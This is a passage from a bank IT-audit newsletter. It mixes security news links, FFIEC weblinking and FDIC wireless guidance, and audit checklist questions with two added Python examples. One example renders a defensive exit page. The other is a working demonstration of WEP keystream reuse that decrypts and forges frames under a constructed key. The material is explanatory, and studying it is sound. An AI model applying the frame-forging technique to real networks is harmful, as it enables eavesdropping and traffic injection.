VISTA - Does
{custom4} need an affordable internal or external
penetration-vulnerability test? R. Kinney Williams &
Associates provides the independence required by the FFIEC IT
Examination Manual. We are IT auditors and do not sell
hardware or software like many IT testing companies and consultants.
In addition, we have over 30 years experience auditing IT operations
for financial institutions, which includes 21 years examination
experience. For more information, give Kinney Williams a call
today at 806-798-7119 or visit
http://www.internetbankingaudits.com/.
FYI -
Securing the Person at the Keyboard - Most information security
incidents can be traced to employees. Although the 2004 Computer
Security Institute (CSI)/U.S. Federal Bureau of Investigation (FBI)
Computer Crime and Security Survey reports that unauthorized use of
computer systems is declining, it remains costly for organizations.
According to the survey, insider abuse of Internet access made up 59
percent of financial losses from misuse of computer systems, while
37 percent of losses stemmed from unauthorized access to
information. Such insider misuse raises a host of security issues
and calls for greater control.
http://www.theiia.org/itaudit/index.cfm?fuseaction=print&fid=5587
FYI - Flaw threatens
T-Mobile voice mail leaks - A convenient voice mail feature has
likely opened up many T-Mobile subscribers' voice mail boxes to anyone armed with a
simple hack, the embattled cellular service provider acknowledged
Thursday.
http://news.zdnet.com/2100-1009_22-5589608.html
FYI - Hackers attack
Japanese government - The Japanese Government has suffered a spate
of cyberattacks on two of its Web sites this week, according to
reports.
http://www.zdnet.co.uk/print/?TYPE=story&AT=39189080-39020375t-10000025c
FYI - Common Web
Application Vulnerabilities - While the World Wide Web has evolved
into a critical delivery pipeline for companies to interact with
their customers, partners and employees, it may also provide a
back door through your security perimeter. Web application
vulnerabilities provide the potential for an unauthorized party to
gain access to critical and proprietary information, use resources
inappropriately, interrupt business or commit fraud.
http://www.computerworld.com/printthis/2005/0,4814,99981,00.html
FYI - ChoicePoint to
tighten data access after ID theft - As ChoicePoint Inc. continues
this week to notify some 145,000 consumers of possible identity
theft after it sold consumer information to fraudulent businesses
last year, the company said it's beginning to double-check its
existing clients to ensure they are legitimate businesses.
http://www.computerworld.com/printthis/2005/0,4814,99945,00.html
FYI - Collins calls GSA
on carpet for personal data snafu - In letters sent late yesterday
to the General Services Administration and Bank of America Corp.,
Sen. Susan Collins expressed outrage that neither the agency nor the
bank had chosen to inform federal employees in December that their
personal information might be at risk.
http://www.gcn.com/vol1_no1/daily-updates/35170-1.html
FYI -
The Federal Reserve Board on Tuesday requested public
comment on a proposal to amend its Regulation CC to set forth rules
governing remotely created checks. In place of a signature, a
remotely created check generally bears a statement that the customer
authorized the check or bears the customer's printed or typed name.
www.federalreserve.gov/boarddocs/press/bcreg/2005/200503012/default.htm
FYI
- British banks in talks to fight ID theft - Major British banks may
soon tighten their security in a bid to protect customers from
identity theft.
http://news.com.com/2102-1029_3-5608885.html?tag=st.util.print
FYI -
Job-Hopping in Silicon Valley: Some Evidence Concerning the
Micro-Foundation of a High Technology Cluster - In Silicon Valley's
computer cluster, skilled employees are reported to move rapidly
between competing firms. If true, this job-hopping facilitates the
reallocation of resources towards firms with superior innovations,
but it also creates human capital externalities that reduce
incentives to invest in new knowledge.
www.federalreserve.gov/pubs/feds/2005/200511/200511pap.pdf
WEB SITE COMPLIANCE -
We
continue our review of the FFIEC interagency statement on "Weblinking:
Identifying Risks and Risk Management Techniques."
(Part 8 of 10)
B. RISK MANAGEMENT TECHNIQUES
Implementing Weblinking Relationships
The strategy that financial institutions choose when
implementing weblinking relationships should address ways to avoid
customer confusion regarding linked third-party products and
services. This includes disclaimers and disclosures to limit
customer confusion and a customer service plan to address confusion
when it occurs.
Disclaimers and Disclosures
Financial institutions should use clear and conspicuous webpage
disclosures to explain their limited role and responsibility with
respect to products and services offered through linked third-party
websites. The level of detail of the disclosure and its prominence
should be appropriate to the harm that may ensue from customer
confusion inherent in a particular link. The institution might post
a disclosure stating it does not provide, and is not responsible
for, the product, service, or overall website content available at a
third-party site. It might also advise the customer that its privacy
policies do not apply to linked websites and that a viewer should
consult the privacy disclosures on that site for further
information. The conspicuous display of the disclosure, including
its placement on the appropriate webpage, by effective use of size,
color, and graphic treatment, will help ensure that the information
is noticeable to customers. For example, if a financial institution
places an otherwise conspicuous disclosure at the bottom of its
webpage (requiring a customer to scroll down to read it), prominent
visual cues that emphasize the information's importance should point
the viewer to the disclosure.
In addition, the technology used to provide disclosures is
important. While many institutions may simply place a disclaimer
notice on applicable webpages, some institutions use
"pop-ups," or intermediate webpages called
"speedbumps," to notify customers they are leaving the
institution's website. For the reasons described below, financial
institutions should use speedbumps rather than pop-ups if they
choose to use this type of technology to deliver their online
disclaimers.
A "pop up" is a screen generated by mobile code, for
example Java or Active X, when the customer clicks on a particular
hyperlink. Mobile code is used to send small programs to the user's
browser. Frequently, those programs cause unsolicited messages to
appear automatically on a user's screen. At times, the programs may
be malicious, enabling harmful viruses or allowing unauthorized
access to a user's personal information. Consequently, customers may
reconfigure their browsers or install software to block disclosures
delivered via mobile codes.
In contrast, an intermediate webpage, or "speedbump,"
alerts the customer to the transition to the third-party website.
Like a pop-up, a speedbump is activated when the customer clicks on
a particular weblink. However, use of a speedbump avoids the
problems of pop-up technology, because the speedbump is not
generated externally using mobile code, but is created within the
institution's operating system, and cannot be disabled by the
customer.
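The speedbump described above is, in practice, a server-rendered exit page reached through a link such as /leave?url=<destination>. The sketch below is an added example written for this newsletter, not text or code from the FFIEC statement; the route name, the institution name and the list of approved partner hosts are assumptions for illustration. Besides rendering the disclosure without any mobile code, it adds the check a practitioner will want: the destination is validated against an allowlist of approved weblinking partners, because an unchecked /leave endpoint is an open redirect that lets a phisher wrap any site in the institution's own disclaimer page.

```python
"""Speedbump (intermediate exit page) for approved third-party weblinks.

Added example, not from the FFIEC statement. The /leave route, the
institution name and APPROVED_HOSTS are assumptions for illustration.
"""
from html import escape
from urllib.parse import urlsplit

# Constructed allowlist of weblinking partners the institution has approved.
APPROVED_HOSTS = {"www.example-insurance.com", "www.example-broker.com"}


def is_approved_link(url: str, approved_hosts=APPROVED_HOSTS) -> bool:
    """Accept only absolute http(s) URLs whose host is an approved partner.

    Rejects javascript: and other schemes, scheme-relative URLs, and
    userinfo tricks such as https://good.example@evil.example/ (hostname
    is taken from the parsed URL, not from a string prefix match).
    """
    try:
        parts = urlsplit(url)
    except ValueError:
        return False
    if parts.scheme not in ("http", "https"):
        return False
    host = (parts.hostname or "").lower()
    return host in approved_hosts


def render_speedbump(url: str, institution: str = "Example Bank") -> str:
    """Return the HTML for the exit page, or raise if the link is not approved.

    The disclosure is plain server-rendered HTML: no script, plug-in or
    pop-up is involved, so a pop-up blocker cannot suppress it, and the
    onward link is an ordinary anchor the customer must click.
    """
    if not is_approved_link(url):
        raise ValueError("destination is not an approved weblinking partner")
    host = escape(urlsplit(url).hostname or "")
    name = escape(institution)
    safe_url = escape(url, quote=True)  # prevents attribute/HTML injection via the URL
    return (
        "<!doctype html><html><head><meta charset='utf-8'>"
        f"<title>You are leaving {name}</title></head><body>"
        f"<h1>You are leaving {name}</h1>"
        f"<p>The link you selected goes to <strong>{host}</strong>, a website "
        f"operated by a third party. {name} does not provide, and is not "
        "responsible for, the products, services or content available there. "
        f"The {name} privacy policy does not apply to the third-party site; "
        "please review that site's own privacy disclosures.</p>"
        f"<p><a href='{safe_url}' rel='noopener noreferrer'>Continue to {host}</a>"
        f" | <a href='/'>Return to {name}</a></p>"
        "</body></html>"
    )


if __name__ == "__main__":
    print(render_speedbump("https://www.example-insurance.com/quote"))
```

In a web framework the handler for /leave would call `render_speedbump` with the `url` query parameter and return HTTP 400 on `ValueError`; the allowlist should be the same list of partner sites the institution's weblinking due-diligence process approved.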
INFORMATION TECHNOLOGY SECURITY - We
continue our coverage of the FDIC's "Guidance
on Managing Risks Associated With Wireless Networks and Wireless
Customer Access."
PART I. Risks Associated with Wireless Internal Networks
Financial institutions are evaluating wireless networks as an
alternative to the traditional cable to the desktop network.
Currently, wireless networks can provide speeds of up to 11Mbps
between the workstation and the wireless access device without the
need for cabling individual workstations. Wireless networks also
offer added mobility allowing users to travel through the facility
without losing their network connection. Wireless networks are also
being used to provide connectivity between geographically close
locations as an alternative to installing dedicated
telecommunication lines.
Wireless differs from traditional hard-wired networking in that it
provides connectivity to the network by broadcasting radio signals
through the airways. Wireless networks operate using a set of FCC-regulated,
unlicensed frequencies (the 2.4 GHz band for 802.11b) to communicate between workstations and
wireless access points. By installing wireless access points, an
institution can expand its network to include workstations within
broadcast range of the network access point.
The most prevalent class of wireless networks currently available is
based on the IEEE 802.11b wireless standard. The standard is
supported by a variety of vendors for both network cards and
wireless network access points. The wireless transmissions can be
encrypted using "Wired Equivalent Privacy" (WEP)
encryption. WEP is intended to provide confidentiality and integrity
of data and a degree of access control over the network. By design,
WEP encrypts traffic between an access point and the client.
However, this encryption method has fundamental weaknesses that make
it vulnerable. WEP is vulnerable to the following types of
attacks:
1) Decrypting information based on statistical analysis;
2) Injecting new traffic from unauthorized mobile stations
based on known plain text;
3) Decrypting traffic based on tricking the access point;
4) Dictionary-building attacks that, after analyzing about a
day's worth of traffic, allow real-time automated decryption of all
traffic (a dictionary-building attack creates a translation table
that can be used to convert encrypted information into plain text
without executing the decryption routine); and
5) Attacks based on documented weaknesses in the RC4
encryption algorithm that allow an attacker to rapidly determine the
encryption key used to encrypt the user's session.
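Attacks 1 and 2 in the list above both come from the same design flaw: WEP seeds RC4 with a 24-bit cleartext IV prepended to the shared key, so IVs repeat after at most 2^24 frames (and much sooner on busy networks), and the integrity check is an unkeyed CRC-32. The following is an added example written for this newsletter, not code from the FDIC guidance; the 40-bit key, IV and frame contents are constructed values, and the frame format is simplified to IV || RC4(IV||key, payload||ICV). It shows that an eavesdropper who knows one frame's plaintext (a predictable ARP or DHCP header, say) recovers the keystream for that IV, decrypts any other frame sent under the same IV, and injects a new frame the access point accepts, all without ever learning the key. The RC4 key-recovery attack of item 5 is a separate statistical attack and is not shown here.

```python
"""WEP keystream reuse: known plaintext -> keystream -> decrypt and forge.

Added example, not from the FDIC guidance. Key, IV and payloads below are
constructed; the frame format is simplified to IV || RC4(IV||key, data||ICV).
"""
import struct
import zlib


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4 (KSA then PRGA). WEP seeds it with the 24-bit IV || key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(payload: bytes) -> bytes:
    """WEP's integrity check value is an unkeyed CRC-32, not a MAC."""
    return struct.pack("<I", zlib.crc32(payload) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, payload: bytes) -> bytes:
    """Station side: IV sent in the clear, RC4(IV||key) over payload||ICV."""
    data = payload + icv(payload)
    return iv + xor(data, rc4_keystream(iv + key, len(data)))


def wep_decrypt(key: bytes, frame: bytes):
    """Access point side: strip IV, decrypt, verify ICV. Returns (payload, icv_ok)."""
    iv, body = frame[:3], frame[3:]
    data = xor(body, rc4_keystream(iv + key, len(body)))
    payload, tag = data[:-4], data[-4:]
    return payload, tag == icv(payload)


# ---- attacker side: sees frames on the air, never learns the key ----

def recover_keystream(frame: bytes, known_payload: bytes) -> bytes:
    """Known plaintext XOR ciphertext = the RC4 keystream for this frame's IV."""
    return xor(frame[3:], known_payload + icv(known_payload))


def decrypt_with_keystream(frame: bytes, keystream: bytes) -> bytes:
    """Attack 1: any other frame under the same IV reuses the same keystream."""
    return xor(frame[3:], keystream)[:-4]


def forge_frame(iv: bytes, keystream: bytes, new_payload: bytes) -> bytes:
    """Attack 2: with the keystream and an unkeyed CRC, any payload that fits verifies."""
    data = new_payload + icv(new_payload)
    if len(data) > len(keystream):
        raise ValueError("not enough recovered keystream for this payload")
    return iv + xor(data, keystream)


def demo():
    key = bytes.fromhex("0a1b2c3d4e")      # constructed 40-bit key, unknown to the attacker
    iv = bytes.fromhex("00ff13")           # constructed IV, visible on the air
    known = b"ARP request from 10.0.0.5 (predictable header)"   # attacker can guess this
    secret = b"transfer 9000 to account 42!!!"                  # sent later under the same IV
    f1 = wep_encrypt(key, iv, known)
    f2 = wep_encrypt(key, iv, secret)
    ks = recover_keystream(f1, known)                # from f1 alone
    recovered = decrypt_with_keystream(f2, ks)       # reads f2 without the key
    forged = forge_frame(iv, ks, b"transfer 9000 to account 66!!!")
    accepted_payload, ok = wep_decrypt(key, forged)  # AP verifies the ICV and accepts
    return recovered, accepted_payload, ok


if __name__ == "__main__":
    print(demo())
```

The same keystream also serves the dictionary-building attack (item 4): an attacker who stores one keystream per IV ends up with a table of at most 2^24 entries that decrypts every subsequent frame without running RC4 at all. None of this is fixed by longer keys, since the IV, not the key length, is what repeats.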
IT SECURITY QUESTION:
Image capturing
operations:
a. Are there automated journals and audit trails that document
access to and modification of images?
b. Are there controls to ensure stored images cannot be altered,
erased or lost?
c. Have procedures been established to prevent the destruction of
original documents before it is determined that the images are
readable?
d. Are there procedures to address traditional controls (such as
date stamps, control numbers, and review signatures)?
e. Are there controls to prevent faulty images, improper indexing,
and incomplete or forged documents from being entered into the
system?
f. Is a backup copy of the image medium stored off-site?
g. Is there a periodic evaluation of legal issues?
INTERNET PRIVACY - We continue our
series listing the regulatory-privacy examination questions.
When you answer the question each week, you will help ensure
compliance with the privacy regulations.
Content of Privacy Notice
10) Does the institution list the following categories of
nonpublic personal information that it discloses, as applicable, and
a few examples of each, or alternatively state that it reserves the
right to disclose all the nonpublic personal information that it
collects:
a) information from the consumer;
b) information about the consumer's transactions with the
institution or its affiliates;
c) information about the consumer's transactions with
nonaffiliated third parties; and
d) information from a consumer reporting agency? [§6(c)(2)]